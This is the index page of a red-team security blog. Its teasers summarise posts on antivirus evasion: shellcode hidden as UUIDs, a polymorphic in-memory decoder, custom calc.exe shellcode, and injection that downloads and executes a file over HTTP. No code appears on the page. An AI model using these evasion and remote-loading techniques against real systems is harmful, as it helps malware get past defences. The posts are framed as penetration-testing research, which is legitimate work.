#nosoc blog

Approved 2024/09/01 22:45 by psycore (version: 5) | Approver: psycore

#nosoc blog

$^\xi xpec_tthe ^un \xi xpecte_d$

Obfuscation: polymorphic in-memory decoder

Red-teaming and penetration tests often require virus scanners to be bypassed in order to effectively detect security vulnerabilities. In the last part we looked at disguising shellcode as a UUID in the source code. This also worked well, but the shellcode was recognised in memory and blocked.

We now want to solve this with a polymorphic in-memory decoder: A shellcode that decodes shellcode.

→ Read more...

Obfuscation: Disguise shellcode as UUIDs

In the last blog post we dealt with the development of a calc.exe shellcode. The injection method that I used for testing was immediately blocked by Windows Defender. I therefore had to adapt the loader and shellcode accordingly.

I came up with the idea of converting the opcodes into a string array, which is filled with UUIDs is filled. These then have to be converted back into bytes before injection. To do this, I wrote an encoder and decoder that does exactly this.

→ Read more...

This page has been moved, the new location is Obfuscation: Disguise shellcode as UUIDs.

Shellcode Injection Part 4

In this article, we will only deal with shellcode obfuscation in passing. At this point, I wanted to develop a custom shellcode to learn more about how it works.

The following requirements should be met:

  • Start of calc.exe on a Windows computer
  • 64-bit code
  • Avoid null bytes

→ Read more...

Shellcode Injection Part 3

Shellcode injections are generally used to initiate a reverse shell. However, in some circumstances it may be necessary to load the code for the shell in the second step.

In this blog post, I show how we can use a shellcode injection to load a file via HTTP and then execute it.

→ Read more...

Older entries >>

New blog entry:
en/index.txt · Last modified: 2024/09/01 22:45
CC Attribution-Noncommercial-Share Alike 4.0 International